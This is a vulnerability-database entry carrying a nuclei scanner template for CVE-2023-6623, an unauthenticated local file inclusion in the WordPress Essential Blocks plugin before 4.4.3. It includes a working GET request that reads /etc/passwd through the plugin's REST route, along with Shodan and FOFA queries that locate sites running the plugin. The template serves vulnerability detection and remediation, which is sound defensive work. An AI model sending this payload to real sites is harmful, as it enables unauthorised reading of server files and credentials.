Essential Blocks < 4.4.3 - Local File Inclusion

Published: 02 Jul 2026 09:36:57
Reported by: ProjectDiscovery
Type: nuclei
Source: github.com

WordPress Essential Blocks < 4.4.3 - LFI vulnerability

Related

Reporter | Title | Published | Family
Circl | CVE-2023-6623 | 15 Jan 2024 17:27 | circl
CNNVD | WordPress Plugin Essential Blocks Security Vulnerability | 15 Jan 2024 00:00 | cnnvd
CVE | CVE-2023-6623 | 15 Jan 2024 15:10 | cve
Cvelist | CVE-2023-6623 Essential Blocks < 4.4.3 - Unauthenticated Local File Inclusion | 15 Jan 2024 15:10 | cvelist
NVD | CVE-2023-6623 | 15 Jan 2024 16:15 | nvd
OSV | CVE-2023-6623 | 15 Jan 2024 16:15 | osv
Patchstack | WordPress Essential Blocks plugin < 4.4.3 - Unauthenticated Local File Inclusion vulnerability | 6 Feb 2026 06:17 | patchstack
Prion | Design/Logic Flaw | 15 Jan 2024 16:15 | prion
Positive Technologies | PT-2023-32722 · WordPress · Essential Blocks | 23 Dec 2023 00:00 | ptsecurity
RedhatCVE | CVE-2023-6623 | 23 May 2025 04:57 | redhatcve
id: CVE-2023-6623

info:
  name: Essential Blocks < 4.4.3 - Local File Inclusion
  author: iamnoooob,rootxharsh,pdresearch,coldfish
  severity: critical
  description: |
    Wordpress Essential Blocks plugin prior to 4.4.3 was discovered to be vulnerable to a significant Local File Inclusion vulnerability that may be exploited by any attacker, regardless of whether they have an account on the site.
  impact: |
    An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server.
  remediation: |
    Upgrade to the latest version of Essential Blocks 4.4.3 to fix this issue.
  reference:
    - https://wpscan.com/blog/file-inclusion-vulnerability-fixed-in-essential-blocks-4-4-3/
    - https://flysec-blog.blogspot.com/2024/01/cve-2023-6623-file-inclusion.html
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6623
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-6623
    cwe-id: CWE-22
    epss-score: 0.50673
    epss-percentile: 0.98782
    cpe: cpe:2.3:a:wpdeveloper:essential_blocks:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: wpdeveloper
    product: essential_blocks
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/essential-blocks/
    fofa-query: body=/wp-content/plugins/essential-blocks/
    publicwww-query: "/wp-content/plugins/essential-blocks/"
  tags: wpscan,cve,cve2023,wp,wp-plugin,wordpress,essential-blocks,lfi,wpdeveloper,vkev,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/index.php?rest_route=%2Fessential-blocks%2Fv1%2Fproducts&is_frontend=true&attributes={"__file":"/etc%2fpasswd"}'
      - '{{BaseURL}}/wp-content/plugins/essential-blocks/readme.txt'

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "regex('root:.*:0:0:', body_1)"
          - 'contains(body_2, "Essential Blocks – Page")'
        condition: and
# digest: 4a0a00473045022075eef36ef7a9c3be4e4364a0b5cb3b34506481c89a79d073f0fa15f75f9f243d0221009a07d6d9a8b67783ebcf699e2c26def55b2ad1c59bcb72486235c4c31ca7432f:922c64590222798bb761d5b6d8e72950
